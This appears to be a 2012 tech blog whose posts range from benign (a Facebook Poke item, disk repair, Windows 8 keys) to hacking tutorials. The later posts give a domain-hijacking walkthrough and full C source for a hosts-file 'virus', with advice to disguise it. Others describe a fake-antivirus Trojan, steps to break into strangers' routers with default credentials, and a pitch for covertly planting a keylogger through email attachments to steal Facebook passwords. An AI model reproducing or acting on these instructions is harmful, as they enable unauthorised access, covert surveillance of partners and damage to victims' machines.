Tuesday, 25 December 2012

Facebook launches self-destructing messages


Social networking site Facebook has launched a new app which erases pictures and messages within 10 seconds of being sent.

It is an advanced version of one of the the social networking site's original apps, the 'poke'.

The equivalent of a head nod or wink, the 'poke' in its old form is rarely used today as the site has become more advanced, the 'Daily Mail' reported.

It has now been reinvented to be called 'Facebook Poke' and allows users to send fleeting messages, pokes, photos and 10-second videos to friends.

The messages expire after a set period of time, from 1 to 10 seconds, and cannot be retrieved by either party again, making it perfect for sending salacious images without leaving a trail.

"With the Poke app, you can poke or send a message, photo, or video to Facebook friends to share what you're up to in a lightweight way," said the site in a blog post announcing the new app.

When you open the app, you can choose from a set of icons at the bottom of the screen to send a poke, type a 120-character message, open the camera to snap a picture - you cannot choose an existing photo - or shoot a 10-second video.

You then decide how long you want the recipient to see the message for.

It is said the new facility is similar to Snapchat, an app which is popular with younger age users, and which has gained a reputation as a tool for sending risque images.

Facebook is encouraging users to report inappropriate messages.

"If you ever see something you're uncomfortable with, you can click the gear menu and report it," the paper quoted the company as saying.

Facebook launches self-destructing messages


Social networking site Facebook has launched a new app which erases pictures and messages within 10 seconds of being sent.

It is an advanced version of one of the the social networking site's original apps, the 'poke'.

The equivalent of a head nod or wink, the 'poke' in its old form is rarely used today as the site has become more advanced, the 'Daily Mail' reported.

It has now been reinvented to be called 'Facebook Poke' and allows users to send fleeting messages, pokes, photos and 10-second videos to friends.

The messages expire after a set period of time, from 1 to 10 seconds, and cannot be retrieved by either party again, making it perfect for sending salacious images without leaving a trail.

"With the Poke app, you can poke or send a message, photo, or video to Facebook friends to share what you're up to in a lightweight way," said the site in a blog post announcing the new app.

When you open the app, you can choose from a set of icons at the bottom of the screen to send a poke, type a 120-character message, open the camera to snap a picture - you cannot choose an existing photo - or shoot a 10-second video.

You then decide how long you want the recipient to see the message for.

It is said the new facility is similar to Snapchat, an app which is popular with younger age users, and which has gained a reputation as a tool for sending risque images.

Facebook is encouraging users to report inappropriate messages.

"If you ever see something you're uncomfortable with, you can click the gear menu and report it," the paper quoted the company as saying.

Monday, 24 December 2012

External Hard Disk suddenly cannot open - Fixed

Your external hard disk was working very good all the times but suddenly you can't open it anymore, when you are trying to open it, it give the error message "You need to format disk in drive before you can use it", and your hard disk is 0 byte, means there is no file inside the hard disk. Means all the data inside the hard disk are gone!!!

Reason :
1) The external hard disk lost power while you are copying a file onto it.
2) The external hard disk usb cable was unplugged while transferring data.

Solution :
Please follow the steps at below :
1) Click the Safely Remove Hardware icon at the bottom right corner near the clock/time area on your desktop to safely remove your external hard disk.

2) Off the power supply of your external hard disk.
3) Unplug the usb cable of your external hard disk from your computer.
4) On the power supply, replug in the usb cable.
5) You will see the error message, Please Cancel it. (DON'T click Okay/Format/Whatever, click the X if necessary).
6) Click the Start button
7) Go to Accessories
8) Click Command Prompt
9) Type chkdsk e: /f (if your external hard disk drive is Drive E)... Replace the e letter if your external hard disk is not drive e.

10) Wait for few minutes to let the program fix the errors on your external hard disk. For me, it took about 5 minutes to fix it. Below is the screen shot that show the fix of my external hard disk :

External Hard Drive not accessible under XP OK in Vista

First step, Start, Programs, Accessories, System Tools, System Restore. Create a restore point and name it something like "Before USB Fix". This is to bail you out if something goes wrong during the following process and makes things worse.

Create a file with NOTEPAD containing the following lines and save it as FIX.REG

-------------------------- Use text after this line --------------------------------
REGEDIT4
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]"DEVMGR_SHOW_NONPRESENT_DEVICES"="1"

-------------------------- Use text before this line --------------------------------

Double click on FIX.REG and say yes to the Merge Into Registry question.

Unplug ALL USB devices.
Open Device Manager.
View, Show Hidden Devices.
Uninstall all devices under USB Controllers.
Uninstall all devices under Disk Drives that you know are not present.
Uninstall all devices under Storage Volumes. Say no to any reboot prompts until you are finished. Also, if a Storage Volume doesn't uninstall, ignore it and move to the next one.
If you have a yellow ? with unknown devices, uninstall all of the entries there as well.

When this is done, reboot TWICE.

Reconnect the USB devices and see if they're recognized properly.

NOTE: If you have a USB keyboard and/or mouse, you'll have to modify the instructions and leave enough parts for those to function. I don't have one yet, so I haven't had time to modify the instructions. __________________
Remember: Data you don't have at least two copies of is data you don't care about.

Thursday, 1 November 2012

Windows 8 Release Preview Product Key(Serial Keys)

  • Are you searching for windows 8 Release Preview Product Key(Serial Keys)?-The you are at the right place :)
Microsoft recently released its new operating system called Windows 8 Release Preview.So,if you have already downloaded Windows 8 RP ISO and trying to install it from a bootable CD or USB then it will ask for product key.
windows+8+release+preview

What is the Windows 8 Release Preview Product Key?

Though Windows 8 RP is a pre release of Microsoft new Operating System still you require product key(Serial Keys) to install windows 8 release preview.When you install windows 8 release preview you will be asked to enter the product key.

Windows+8+release+preview+product+key

Product Key for Windows 8 Release Preview:

As this is not the final release Microsoft mentioned the Windows 8 Release Preview Product key on their website.They gave a universal product key which works for every windows 8 user.This will not work for final release of Windows 8.
Windows 8 Release Preview Universal Product key:
TK8TP-9JN6P-7X7WW-RFFTV-B7QPF
If you want to enable Windows 8 Media Center use the below product key:
MBFBV-W3DP2-2MVKN-PJCQD-KKTF7 

NOTE THAT THESE KEYS ARE PROVIDED OFFICIALLY BY MICROSOFT.WE DO NOT SUPPORT OR PROMOTE SOFTWARE PIRACY.THESE KEYS WORK ONLY ON WINDOWS 8 RELEASE PREVIEW AND WONT WORK ON OTHER VERSIONS OF WINDOWS.

How to create a Windows 8 system repair disc

Windows 8 ships with options to create a system repair disc from within the operating system just like previous versions of Microsoft Windows did. What you need to know before you get started is that you can only create a system repair disc for the operating system version you are using. If you are running a 32-bit version, you can only create a disc that is compatible with 32-bit versions of the operating system.
The system repair disc can be used to boot into a recovery environment in situations where the Windows 8 operating system is not booting anymore.
To create a Windows 8 system repair disc do the following:
  • Press Windows-q to open the application search menu. If you are on the desktop, you are automatically switched to the search interface on the start screen.
  • Enter recdisc and hit return afterwards. This loads a menu on the desktop that you can use to create the disc.
  • Enter a blank CD or DVD into a CD writer connected to the computer and select its drive letter if it is not selected already.
  • It should not take longer than a couple of minutes to create the repair disc. If you have a fast CD or DVD writer, it should complete in less than a minute.
create a system repair disc
You need to boot from the recovery disc, and to do that, you may need to configure the BIOS or UEFI of your computer to boot from CD/DVD if the drive is not the first choice.
The interface itself offers the following options:
  • Selection of various keyboard layouts
  • Continue to Windows 8 to boot the operating system
  • Troubleshoot to access refresh and reset from here as well as advanced recovery tools
  • Turn off the PC
The advanced tools offer the following features:
  • Access System Restore to restore Windows to a previous state
  • System Image Recovery using a previously created backup image file
  • Automatic Repair to have Windows try and fix issues automatically
  • Command Prompt
windows 8 recovery options
The very same options are available when you select to run Windows 8 with advanced startup parameters. This can be initiated when you still have access to the operating system. To do that press Windows-C to open the Charms Bar.  Click Settings > Change PC Settings and wait for the configuration screen to load. Switch to General here and scroll down until you see Advanced Startup.
Start up from a device or disc (such as a USB or DVD, change Windows startup settings, or restore Windows from a system image. This will restart your PC.
A click on restart now reboots the PC and displays the advanced startup options on the screen. Note that you will see one additional option listed here. Startup Settings enables you to restart to change a variety of Windows options including:
  • Enable low-resolution video mode
  • Enable debugging mode
  • Enable boot logging
  • Enable Safe Mode
  • Disable driver signature enforcement
  • Disable early-launch anti-malware protection
  • Disable automatic restart on system failure
The options are displayed as numbers on the next start of the system.
It is highly recommended to create a system repair disc for Windows 8, or any other operating system for that matter, especially so if you do not have other recovery options at hand

How to install Windows 8 without product key

If you have installed the final version of Windows 8 on a PC recently, you have noticed that you had to enter a valid product key at one time during setup to continue with it. That’s different from previous versions of the Windows operating system where you had the option to install the system without a product key. This was a way to try out the operating system for a specific amount of time before you either had to enter a product key or uninstall it (yes, even if you used the rearm command).
Windows Vally reports that there is still a way to install Windows 8 without entering a product key during setup. It requires a little bit of tweaking, but no modification of any files of the operating system. You basically add a file to the ISO image. What you need is a Windows 8, Windows 8 Pro or Enterprise ISO image, and a program like 7-Zip to extract the contents of the disk image to your local drive.
windows 8 installation
Once you have extracted the contents of the ISO, create the ei.cfg document in the Sources folder of the operating system. Add the following lines to the system:
[EditionID]
Core
[Channel]
Retail
[VL]
0
You can replace Core with Pro or Enterprise, Retail with OEM, and VL with 1 (for true). Once that has been taken care of, you need to create a bootable Windows 8 ISO image again. The whole process is explained.
For that, you need the Assessment and Deployment Kit for Windows 8, which you can download from Microsoft. You can alternative use a software like ImgBurn directly to create the bootable ISO image.
Once you have created and burned the ISO image, you can run the installation from it. When you get to the product key screen simply skip it when it appears.

Sunday, 9 September 2012

Domain Hijacking – How to Hijack a Domain







In this post I will tell you about how the domain names are hacked and how they can be protected. The act of hacking domain names is commonly known as Domain Hijacking. For most of you, the term “domain hijacking” may seem to be like an alien. So let me first tell you what domain hijacking is all about.



Domain hijacking is a process by which Internet Domain Names are stolen from it’s legitimate owners. Domain hijacking is also known as domain theft. Before we can proceed to know how to hijack domain names, it is necessary to understand how the domain names operate and how they get associated with a particular web server (website).
 

The operation of domain name is as follows

 
Any website say for example gohacking.com consists of two parts. The domain name(gohacking.com) and the web hosting server where the files of the website are actually hosted. In reality, the domain name and the web hosting server (web server) are two different parts and hence they must be integrated before a website can operate successfully. The integration of domain name with the web hosting server is done as follows.

1. After registering a new domain name, we get a control panel where in we can have a full control of the domain. 

2. From this domain control panel, we point our domain name to the web server where the website’s files are actually hosted.

For a clear understanding let me take up a small example.

John registers a new domain “abc.com” from an X domain registration company. He also purchases a hosting plan from Y hosting company. He uploads all of his files (.html, .php, javascripts etc.) to his web server (at Y). From the domain control panel (of X) he configures his domain name “abc.com” to point to his web server (of Y). Now whenever an Internet user types “abc.com”, the domain name “abc.com” is resolved to the target web server and the web page is displayed. This is how a website actually works.
 

What happens when a domain is hijacked

 
Now let’s see what happens when a domain name is hijacked. To hijack a domain name you just need to get access to the domain control panel and point the domain name to some other web server other than the original one. So to hijack a domain you need not gain access to the target web server.

For example, a hacker gets access to the domain control panel of  “abc.com”. From here the hacker re-configures the domain name to point it to some other web server (Z). Now whenever an Internet user tries to access “abc.com” he is taken to the hacker’s website (Z) and not to John’s original site (Y).

In this case the John’s domain name (abc.com) is said to be hijacked.
 

How the domain names are hijacked

 
To hijack a domain name, it’s necessary to gain access to the domain control panel of the target domain. For this you need the following ingredients

1. The domain registrar name for the target domain.

2. The administrative email address associated with the target domain. 

These information can be obtained by accessing the WHOIS data of the target domain. To get access the WHOIS data, goto whois.domaintools.com, enter the target domain name and click on Lookup. Once the whois data is loaded, scroll down and you’ll see Whois Record. Under this you’ll get the “Administrative contact email address”.

To get the domain registrar name, look for something like this under the Whois Record. “Registration Service Provided By: XYZ Company”. Here XYZ Company is the domain registrar. In case if you don’t find this, then scroll up and you’ll see ICANN Registrar under the “Registry Data”. In this case, the ICANN registrar is the actual domain registrar.

The administrative email address associated with the domain is the backdoor to hijack the domain name. It is the key to unlock the domain control panel. So to take full control of the domain, the hacker will hack the administrative email associated with it. Email hacking has been discussed in my previous post how to hack an email account.

Once the hacker take full control of this email account, he will visit the domain registrar’s website and click on forgot password in the login page. There he will be asked to enter either the domain name or the administrative email address to initiate the password reset process. Once this is done all the details to reset the password will be sent to the administrative email address. Since the hacker has the access to this email account he can easily reset the password of domain control panel. After resetting the password, he logs into the control panel with the new password and from there he can hijack the domain within minutes.

A Virus Program to Disable USB Ports










In this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.


Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.

1. Download the USB_Block.rar file on to your computer.

2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.

3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).

4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.

5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).

A Virus Program to Block Websites













Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.



This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.

NOTE: You can also block a website manually. But, here I have created a virus that automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
 
Here is the sourcecode of the virus.

#include<stdio.h>
#include<dos.h>
#include<dir.h> char site_list[6][30]={
“google.com”,
“www.google.com”,
“youtube.com”,
“www.youtube.com”,
“yahoo.com”,
“www.yahoo.com”
};
char ip[12]=”127.0.0.1″;
FILE *target;
int find_root(void);
void block_site(void);
int find_root()
{
int done;
struct ffblk ffblk;//File block structure
done=findfirst(“C:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“C:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“D:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“D:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“E:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“E:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
done=findfirst(“F:\\windows\\system32\\drivers\\etc\\hosts”,&ffblk,FA_DIREC);
/*to determine the root drive*/
if(done==0)
{
target=fopen(“F:\\windows\\system32\\drivers\\etc\\hosts”,”r+”);
/*to open the file*/
return 1;
}
else return 0;
}
void block_site()
{
int i;
fseek(target,0,SEEK_END); /*to move to the end of the file*/
fprintf(target,”\n”);
for(i=0;i<6;i++)
fprintf(target,”%s\t%s\n”,ip,site_list[i]);
fclose(target);
}
void main()
{
int success=0;
success=find_root();
if(success)
block_site();
}

Testing

1. To test, run the compiled module. It will block the sites that is listed in the source code.

2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.

3. To remove the virus type the following the Run. 

%windir%\system32\drivers\etc
 
4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this

127.0.0.1                                google.com
 
5. Delete all such entries which contain the names of blocked sites.

How to Make a Trojan Horse












Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language. This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as Space Eater Trojan. Since this Trojan is written using a high level programming language it is often undetected by antivirus. The source code for this Trojan is available for download at the end of this post. Let’s see how this Trojan works…

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works. As most of us think a Trojan or a Trojan horse is not a virus. In simple words a Trojan horse is a program that appears to perform a desirable function but in fact performs undisclosed malicious functions that allow unauthorized access to the host machine or create a damage to the computer.
 
Now lets move to the working of our Trojan

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the.dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
 
The algorithm of the Trojan is as follows

1. Search for the root drive

2. Navigate to WindowsSystem32 on the root drive

3. Create the file named “spceshot.dll

4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full

5. Once the drive is full, stop the process.

How to compile, test and remove the damage?

 
Compilation:
For step-by-step compilation guide, refer my post How to compile C Programs.

Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.
 
How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

Please pass your comments and tell me your opinion.

How to Alter Windows Product ID?

If you are running a Microsoft Windows operating system on your computer, then you are most likely aware of the fact that your PC will have a Product ID. This Product ID is a system specific alphanumeric code which is derived/calculated based on the Windows product key you use and the hardware configuration of your Computer. In simple words, Product ID is the alphanumeric code that you see when you Right-Click on the My Computer icon and select theProperties option. 
 

Ever wondered how to alter the Windows Product ID?

 
It is possible to alter the Windows Product ID and change it to what ever you like. For example, you can change the Product ID and put your nickname in place of the formal Product ID displayed by the Operating System. This hack is too easy and can be done within minutes. The screenshot showing the altered Product ID is given below
 
Win 7 PC showing Original PID





 Windows 7 PC showing Altered PID


  



As you can see from the above screenshot it is simple and easy to make your Windows display what ever you want in the place of the real Product ID. Here is a step-by-step procedure to alter your Windows Product ID.

1. Goto Start->Run and type the following in the Run dialog box
regedit
 
2. After you open the Registry Editor, navigate to the following key
HKey_Local_Machine\Software\Microsoft\Windows NT\Current Version
 
3. On the right hand side, you can see an entry by name ProductID listed under the headingName.

4. Double-Click on ProductID, a dialog box will pop-up showing your Windows PID. Now you can delete the original PID and enter anything of your choice.

5. Once you are done, just click on OK and close the Registry Editor. Now you can see the altered Product ID in the Windows Properties window.

NOTE: This trick works on Win 7, Vista and Win XP
 
I hope you like this trick. Pass your comments. Cheers!

How to Hack an Ethernet ADSL Router


Almost half of the Internet users across the globe use ADSL routers/modems to connect to the Internet however, most of them are unaware of the fact that it has a serious vulnerability in it which can easily be exploited by anyone with a basic knowledge of computer.
In this post, I will show you how to exploit a common vulnerability that lies in most ADSL routers so as to gain complete access to the router settings and ISP login details.
Every router comes with a username and password using which it is possible to gain access to the router settings and configure the device. The vulnerability actually lies in theDefault username and password that comes with the factory settings. Usually the routers come preconfigured from the Internet Service provider and hence the users do not bother to change the password later.
This makes it possible for the attackers to gain unauthorized access to the router and modify it’s settings using a common set of default usernames and passwords. Here is how you can do it. Before you proceed, you need the following tool in the process:
Here is a detailed information on how to exploit the vulnerability of an ADSL router:
    1. Go to www.whatismyipaddress.com. Once the page is loaded, you will find your IP address. Note it down.
    2. Open Angry IP Scanner, here you will see an option called IP Range: where you need to enter the range of IP address to scan for.
Suppose your IP is 117.192.195.101, you can set the range something as117.192.194.0 to 117.192.200.255 so that there exists at least 200-300 IP addresses in the range.
    1. Go to Tools->Preferences and select the Ports tab. Under Port selection enter 80(we need to scan for port 80). Now switch to the Display tab, select the option “Hosts with open ports only” and click on OK.
IP Scanner Settings
I have used Angry IP Scanner v3.0 beta-4. If you are using a different version, you need to Go to Options instead of Tools
    1. Now click on Start. After a few minutes, the IP scanner will show a list of IPs with Port 80 open as shown in the below image:
Angry IP Scanner
  1. Now copy any of the IP from the list, paste it in your browser’s address bar and hit enter. A window will popup asking for username and password. Since most users do not change the passwords, it should most likely work with the default username and password. For most routers the default username-password pair will be admin-admin or admin-password.
Just enter the username-password as specified above and hit enter. If you are lucky you should gain access to the router settings page where you can modify any of the router settings. The settings page can vary from router to router. A sample router settings page is shown below:
Router Settings Page Hacked!
If you do not succeed to gain access, select another IP from the list and repeat the step-5. At least 1 out of 5 IPs will have a default password and hence you will surely be able to gain access.

What can an Attacker do by Gaining Access to the Router Settings?

By gaining access to the router settings, it is possible for an attacker to modify any of the router settings which results in the malfunction of the router. As a result the target user’s computer will be disconnected from the Internet. In the worst case the attacker can copy the ISP login details from the router to steal the Internet connection or play any kind of prank with the router settings.If this happens, the victim will have to reconfigure/reset the router settings in order to bring it back to the action.

The Verdict:

If you are using an ADSL router to connect to the Internet, it is highly recommended that you immediately change your password to prevent any such attacks in the future. Who knows, you may be the next victim of such an attack.
Since the configuration varies from router to router, you need to contact your ISP for details on how to change the password for your model.
Warning!
All the information provided in this post are for educational purposes only. Please do not use this information for illegal purposes.

How to Hack a Facebook Password


Wondering to know how to hack a Facebook password? Well, before you can do that, it is very much necessary to understand the real ways of hacking that actually work and also those that are simply scam and do not work. So, in this post we’ll look at some of the possible ways to hack Facebook password!
Every day I get a lot of emails from people requesting me to hack Facebook passwords of their spouse, girlfriend or boyfriend so as to reveal their secret relationships (if any). Most of them are even willing to pay for the service.
However, I strongly deny any such requests since I do not provide any paid hacking service. But anyhow, I have decided to write down this post so that you can learn the tricks for yourself and implement everything at your own risk.

Possible Ways to Hack a Facebook Password:

With my experience of over 9 years in the field of ethical hacking and IT security, all I can tell you is that there are only two ways to successfully hack a Facebook password.

1. Keylogging – The Easiest Way!

Keylogging refers to simply recording each and every keystroke that is  typed on a specific computer’s keyboard. This is possible with the use of a small computer program called keylogger (also known as spy software). Once installed, this program will automatically load from the start-up, runs in the invisible mode and start capturing each and every keystroke that was typed on the computer.
Some keyloggers with advanced features can also capture screenshots and monitor every activity of the computer. One doesn’t need to have any special knowledge in order to install and use a keylogger. That means, anyone with a basic knowledge of computer can install and use this software with ease.
Hence, for a novice computer, user this method is the easiest way to hack a Facebook password. I recommend the following keylogger as the best option you can go for:
Why SniperSpy is the Best?
Today, there exists hundreds of keyloggers on the market but where of them are nothing more than a crap. However, there are only a few that stand out of the crowd and SniperSpy is the best among them.
I personally like SniperSpy for it’s REMOTE INSTALLATION FEATURE. With this, you can install it on a remote computer without the need for having physical access to it. It operates in a complete stealth mode so that it remains 100% undetected!
Here is a summary of benefits that you will receive with Sniperspy:
  1. Access ANY Password
    With SniperSpy, you can hack any password and gain access to Facebook or any other online account.
  2. Monitor Every Activity
    You can monitor every activity of the target computer, take screenshots and record chats & IM conversations.
  3. Never Get Caught!
    SniperSpy operates in a total stealth mode and thus remains undetected. Therefore you need not have the fear of being traced back or getting caught.
  4. Completely Safe to Use
    This software is 100% safe to use since it does not collect any personal information from your computer. SniperSpy is a reputed, trustworthy and reliable company which offers 100% privacy for it’s users.
  5. Works on both Windows and Mac
    Fully compatible with Windows 2000/XP/Vista/7 and Mac.

How it Works?

Since the deployment module is very small in size (81 kb), you can easily drop it onto a word document, image or any other file and send it as an email attachment. This makes the process stealth and the target user will have nothing to suspect. Once they open the attachment, SniperSpy will install silently and the monitoring process will begin.
You can login to your secure control panel from any browser and start viewing the logs to get the password!
So, if you are really serious to hack Facebook password then SniperSpy is for you. Go grab it now and expose the truth!